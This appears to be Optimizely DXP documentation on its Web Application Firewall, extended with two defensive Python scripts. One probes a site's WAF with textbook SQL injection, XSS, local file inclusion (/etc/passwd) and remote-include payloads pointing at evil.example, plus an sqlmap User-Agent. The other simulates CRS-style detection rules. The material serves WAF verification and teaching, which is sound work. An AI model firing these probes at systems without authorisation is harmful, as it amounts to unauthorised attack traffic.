
Web Application Firewall

Describes the Web Application Firewall (WAF) concept as it applies to solutions built on Optimizely Digital Experience Platform (DXP).

In DXP, the Web Application Firewall (WAF) is always enabled. It monitors website traffic continuously and filters malicious traffic at the web application layer (layer 7 of the Open Systems Interconnection (OSI) model), before it reaches your application. The WAF inspects the HTTP requests sent to your website, including the query string of GET requests and the body of POST requests, and applies rules that separate illegitimate traffic from legitimate visitors. A request that matches a rule is challenged or blocked.

How does WAF protect my website?

The WAF automatically protects against the following classes of attack:

  • SQL injection and comment spam
  • Cross-site scripting (XSS)
  • Distributed denial of service (DDoS) attacks at the application layer, such as HTTP floods; volumetric attacks at lower layers are handled by the DDoS mitigation the WAF is integrated with

The WAF uses rulesets to block common attacks such as cross-site scripting (XSS) and SQL injection. Optimizely can update these rulesets at any time to keep the WAF current with evolving attack trends. Because DXP absorbs a significant volume of attack traffic across all its customers, Optimizely sees new attack styles early and adds WAF rules for them, so every customer is protected without having to change anything in their own solution.

By default the WAF engine runs the OWASP ModSecurity Core Rule Set (CRS), which covers the injection and other request-level attack classes in the OWASP Top 10. Note that a WAF only sees the HTTP request; it cannot detect logic flaws such as broken access control, so the CRS is a layer in front of secure application code, not a substitute for it.
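The description above says which attack classes the WAF blocks, but not how to confirm that on your own site. The following script, added here as an example and not Optimizely's or DXP's own tooling, sends one benign control request and one textbook probe per rule family (SQL injection, XSS, local and remote file inclusion, a scanner User-Agent), in both the query string and a POST body, and reports whether each was blocked. The target URL, the parameter name q, the assumption that sqlmap/1.0 is on the bad-robots list, and the block heuristic (HTTP 403, or a 429/503 carrying a challenge page) are assumptions to adjust for your site. A constructed simulated_waf_transport lets the script be dry-run offline.

```python
import sys
import urllib.error
import urllib.parse
import urllib.request
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple

# One probe per rule family: textbook signatures a CRS-style ruleset should
# flag. They are harmless against a correctly built site.
PROBES: Dict[str, str] = {
    "sqli": "1' OR '1'='1' -- ",
    "xss": "<script>alert(1)</script>",
    "lfi": "../../../../etc/passwd",
    "rfi": "http://evil.example/shell.txt?",
}
BAD_ROBOT_UA = "sqlmap/1.0"     # assumed to be on the WAF's bad-robots list
CONTROL_UA = "waf-check/1.0"    # assumed NOT to be on that list

# A transport is callable(method, url, headers, body) -> (status, body_text).
Transport = Callable[[str, str, Dict[str, str], Optional[bytes]], Tuple[int, str]]

@dataclass
class Result:
    name: str
    method: str
    status: int
    blocked: bool

def urllib_transport(method: str, url: str, headers: Dict[str, str],
                     body: Optional[bytes]) -> Tuple[int, str]:
    """Live transport: send the request, return status code and body text."""
    req = urllib.request.Request(url, data=body, headers=headers, method=method)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:    # a 403 block page is still an answer
        return err.code, err.read().decode("utf-8", "replace")

def simulated_waf_transport(method: str, url: str, headers: Dict[str, str],
                            body: Optional[bytes]) -> Tuple[int, str]:
    """Constructed stand-in for a WAF-fronted site so the script can be
    dry-run offline. It blocks on crude markers; a real CRS is far stricter."""
    text = urllib.parse.unquote_plus(url + "&" + (body.decode() if body else "")).lower()
    if "sqlmap" in headers.get("User-Agent", "").lower():
        return 403, "<html>Access denied</html>"
    if any(m in text for m in ("' or '", "<script", "../", "http://")):
        return 403, "<html>Access denied</html>"
    return 200, "<html>ok</html>"

def is_blocked(status: int, body: str) -> bool:
    """403, or a 429/503 carrying a challenge page, means the WAF acted;
    anything else means the request reached the origin."""
    return status == 403 or (status in (429, 503) and "challenge" in body.lower())

def send(transport: Transport, method: str, base_url: str, param: str,
         value: str, user_agent: str) -> Tuple[int, str]:
    headers = {"User-Agent": user_agent}
    encoded = urllib.parse.urlencode({param: value})
    if method == "GET":
        return transport("GET", f"{base_url}?{encoded}", headers, None)
    headers["Content-Type"] = "application/x-www-form-urlencoded"
    return transport("POST", base_url, headers, encoded.encode())

def run_probes(base_url: str, param: str = "q",
               transport: Transport = urllib_transport) -> List[Result]:
    results: List[Result] = []
    # Control first: if a harmless request is blocked, the probe verdicts say
    # nothing about the rules (the site may be down or blocking your address).
    status, body = send(transport, "GET", base_url, param, "hello", CONTROL_UA)
    results.append(Result("control", "GET", status, is_blocked(status, body)))
    for name, payload in PROBES.items():
        for method in ("GET", "POST"):      # the WAF inspects both locations
            status, body = send(transport, method, base_url, param, payload, CONTROL_UA)
            results.append(Result(name, method, status, is_blocked(status, body)))
    status, body = send(transport, "GET", base_url, param, "hello", BAD_ROBOT_UA)
    results.append(Result("bad-robot", "GET", status, is_blocked(status, body)))
    return results

def summarize(results: List[Result]) -> Dict[str, bool]:
    """'probe/METHOD' -> True when the WAF behaved as expected: the control
    must pass and every probe must be blocked."""
    return {f"{r.name}/{r.method}": (not r.blocked) if r.name == "control" else r.blocked
            for r in results}

if __name__ == "__main__":
    # python waf_check.py https://www.example.com/search  (live)   or no argument (dry run)
    if len(sys.argv) > 1:
        outcome = summarize(run_probes(sys.argv[1]))
    else:
        outcome = summarize(run_probes("https://www.example.com/search",
                                       transport=simulated_waf_transport))
    for key, ok in outcome.items():
        print(f"{'OK  ' if ok else 'FAIL'} {key}")
```

Run it against a non-production environment and expect the control row to pass and every other row to be blocked. A FAIL on the control means the site, or your own address, is being blocked and the probe verdicts are meaningless; a FAIL on a probe means that request reached the origin and is worth raising with support, since the rules cannot be tuned from your side.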

WAF and Digital Experience Cloud (DXC) Service

  • Automatic protection from a broad range of threats through strong default rulesets, providing application-layer protection that is integrated with the platform's DDoS mitigation.
  • Fast processing with near-instant global rule updates.
  • Helps meet PCI DSS requirement 6.6 without a separate WAF product (see below).
  • No hardware, software, or tuning is required because the WAF is part of DXP.

Security does not come at the cost of speed. When an attack occurs, DXP responds without slowing your visitors down:

  • New rules typically take effect globally in under 30 seconds.
  • The WAF typically adds less than one millisecond of latency per request.

Compliance for PCI DSS requirement 6.6

Requirement 6.6 of PCI DSS 2.0 and 3.x applies to the public-facing web applications of merchants that handle cardholder data, and is satisfied by either of the following:

  • Deploy a WAF in front of the in-scope web application. (A WAF is included with DXC Service.)
  • Review the in-scope web applications with manual or automated vulnerability assessment tools or methods, at least annually and after any change.

In PCI DSS 4.0 the same requirement is numbered 6.4.1, and from 31 March 2025 requirement 6.4.2 makes an automated technical solution that continually detects and prevents web-based attacks (such as a WAF in blocking mode) mandatory rather than one of two options. Either way, the DXP WAF addresses only this one requirement; the rest of the standard still applies to the application and its handling of cardholder data.

The following table lists the default WAF rulesets in DXP, which are tuned for Optimizely applications and based on best practices. Custom rulesets cannot be defined at this time, so if a legitimate request is blocked (a false positive, for example an editor saving content that contains script tags or SQL-like text), you cannot tune the rules yourself and should raise the case with Optimizely support.

Ruleset | Description
OWASP Bad Robots | Detects bad web robots that are not search engines but perform malicious scanning and spidering of websites.
OWASP Generic Attacks | Detects generic attacks against web applications without specific knowledge of the application, such as attempts to access an LDAP directory, shell command injection, and attacks against PHP.
OWASP HTTP Policy | Enforces policy on the HTTP protocol, such as which methods are supported and which headers are allowed.
OWASP Protocol Anomalies | Detects unusual use of the HTTP protocol that may indicate an attack but may also be legitimate.
OWASP Protocol Violations | Detects violations of the HTTP protocol that often indicate an attacker probing a site.
OWASP Request Limits | Detects excessively large numbers of HTTP headers, HTTP arguments, or files.
OWASP SLR ET LFI Attacks | Detects local file inclusion (LFI) attacks.
OWASP SLR ET RFI Attacks | Detects remote file inclusion (RFI) attacks.
OWASP SLR ET SQLi Attacks | Detects SQL injection (SQLi) attacks.
OWASP SLR ET XSS Attacks | Detects cross-site scripting (XSS) attacks.
OWASP Trojans | Detects common web trojans (backdoor web shells).
OWASP SQL Injection Attacks | Detects attacks against SQL servers that attempt to inject SQL statements through the web to leak information or take control of a SQL server.
OWASP XSS Attacks | Detects cross-site scripting (XSS) attacks that may result in unwanted HTML being inserted into web pages.
OWASP URI SQL Injection Attacks | Detects the same SQL injection attacks when they are carried in the request URI.
OWASP URI XSS Attacks | Detects the same cross-site scripting (XSS) attacks when they are carried in the request URI.

The SLR ET rulesets are the SpiderLabs Research rules derived from Emerging Threats signatures; they target specific known-vulnerable applications and complement the generic SQL injection, XSS, LFI, and RFI rules. The URI rulesets apply the SQL injection and XSS checks to the request path rather than to the query string or body.
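To show what the rule families in the table do to an actual request, here is a miniature CRS-style inspector, added as an illustration and not the ModSecurity or DXP engine. The signatures, scores, limits, and the anomaly threshold of 5 are simplified assumptions; the real CRS has hundreds of rules. It demonstrates three things the description on this page implies: GET and POST arguments are decoded (twice, so double-encoded payloads are caught) and inspected by the same rules; protocol anomalies that may be legitimate get a low score and block only in combination with something else; and policy violations such as an unsupported method are blocked outright. The sample requests are constructed, not captured traffic.

```python
import re
import urllib.parse
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

@dataclass
class Request:
    method: str
    path: str                   # may carry the query string
    headers: Dict[str, str]
    body: str = ""              # application/x-www-form-urlencoded only

@dataclass
class Rule:
    family: str                 # a row of the ruleset table
    pattern: re.Pattern
    score: int                  # 5 critical, 3 warning, 2 notice (assumed)
    args_only: bool = False     # RFI: a URL in a Referer header is normal

# Deliberately tiny signature set; the real CRS has hundreds of rules.
RULES = [
    Rule("OWASP SQL Injection Attacks",
         re.compile(r"(?i)(\bunion\b.+\bselect\b|'\s*or\s*'[^']*'\s*=\s*'|--\s*$|\bsleep\s*\()"), 5),
    Rule("OWASP XSS Attacks", re.compile(r"(?i)(<script|javascript:|<\w+[^>]*\son\w+\s*=)"), 5),
    Rule("OWASP SLR ET LFI Attacks", re.compile(r"(\.\./|/etc/passwd)"), 5),
    Rule("OWASP SLR ET RFI Attacks", re.compile(r"(?i)^(?:https?|ftp)://"), 5, args_only=True),
]
BAD_ROBOTS = re.compile(r"(?i)(sqlmap|nikto|masscan|nmap)")
ALLOWED_METHODS = {"GET", "HEAD", "POST", "OPTIONS"}
MAX_ARGS, MAX_HEADERS = 100, 50     # assumed request limits
BLOCK_THRESHOLD = 5                 # anomaly score at which a request is blocked

@dataclass
class Verdict:
    score: int = 0
    matches: List[Tuple[str, str]] = field(default_factory=list)   # (family, location)

    @property
    def blocked(self) -> bool:
        return self.score >= BLOCK_THRESHOLD

def _targets(req: Request, hdrs: Dict[str, str]) -> List[Tuple[str, str]]:
    """Flatten the request into (location, value) pairs. Every argument is
    URL-decoded once more than the parser already did, so a double-encoded
    payload (%2527 -> %27 -> ') is inspected in its final form."""
    path, _, query = req.path.partition("?")
    out = [("REQUEST_URI", urllib.parse.unquote(path))]
    for k, v in urllib.parse.parse_qsl(query, keep_blank_values=True):
        out.append((f"ARGS_GET:{k}", urllib.parse.unquote(v)))
    for k, v in urllib.parse.parse_qsl(req.body, keep_blank_values=True):
        out.append((f"ARGS_POST:{k}", urllib.parse.unquote(v)))
    for h in ("user-agent", "referer", "cookie"):
        if h in hdrs:
            out.append((f"REQUEST_HEADERS:{h}", hdrs[h]))
    return out

def inspect_request(req: Request) -> Verdict:
    v = Verdict()
    hdrs = {k.lower(): val for k, val in req.headers.items()}

    def hit(family: str, where: str, score: int) -> None:
        v.score += score
        v.matches.append((family, where))

    if req.method.upper() not in ALLOWED_METHODS:           # OWASP HTTP Policy
        hit("OWASP HTTP Policy", f"REQUEST_METHOD:{req.method}", 5)
    if not hdrs.get("host"):                                # OWASP Protocol Violations
        hit("OWASP Protocol Violations", "REQUEST_HEADERS:host", 3)
    for h in ("user-agent", "accept"):                      # OWASP Protocol Anomalies:
        if h not in hdrs:                                   # odd but often legitimate, so
            hit("OWASP Protocol Anomalies", f"REQUEST_HEADERS:{h}", 2)   # a low score
    if BAD_ROBOTS.search(hdrs.get("user-agent", "")):       # OWASP Bad Robots
        hit("OWASP Bad Robots", "REQUEST_HEADERS:user-agent", 5)
    targets = _targets(req, hdrs)
    n_args = sum(loc.startswith("ARGS") for loc, _ in targets)
    if n_args > MAX_ARGS or len(req.headers) > MAX_HEADERS: # OWASP Request Limits
        hit("OWASP Request Limits", "ARGS/HEADERS", 3)
    for loc, value in targets:                              # signature rules
        for rule in RULES:
            if rule.args_only and not loc.startswith("ARGS"):
                continue
            if rule.pattern.search(value):
                hit(rule.family, loc, rule.score)
    return v

def demo_requests() -> Dict[str, Request]:
    """Constructed sample requests, not captured traffic."""
    ok = {"Host": "www.example.com", "User-Agent": "Mozilla/5.0", "Accept": "text/html"}
    form = {**ok, "Content-Type": "application/x-www-form-urlencoded"}
    return {
        "benign search": Request("GET", "/search?q=red+shoes&page=2", ok),
        "encoded xss in query": Request("GET", "/search?q=%3Cscript%3Ealert(1)%3C/script%3E", ok),
        "double-encoded sqli in body": Request(
            "POST", "/login", form, "user=admin%2527%2520OR%2520%25271%2527%253D%25271&pass=x"),
        "rfi via url parameter": Request("GET", "/page?include=http://evil.example/shell.txt", ok),
        "missing accept header": Request("GET", "/", {"Host": "www.example.com", "User-Agent": "curl/8.0"}),
        "missing host header": Request("GET", "/", {"User-Agent": "curl/8.0"}),
        "scanner user-agent": Request("GET", "/", {**ok, "User-Agent": "sqlmap/1.7"}),
        "unsupported method": Request("TRACE", "/", ok),
    }

if __name__ == "__main__":
    for name, req in demo_requests().items():
        verdict = inspect_request(req)
        print(f"{'BLOCK' if verdict.blocked else 'pass '} score={verdict.score:<2} {name}: {verdict.matches}")
```

Running the file prints a verdict per sample. The "missing accept header" request passes with a score of 2 while "missing host header" reaches the threshold because two cheap anomalies add up; that accumulation is the anomaly-scoring behaviour that makes a WAF both tolerant of odd clients and prone to occasional false positives, which matters on DXP because the rules cannot be tuned per site.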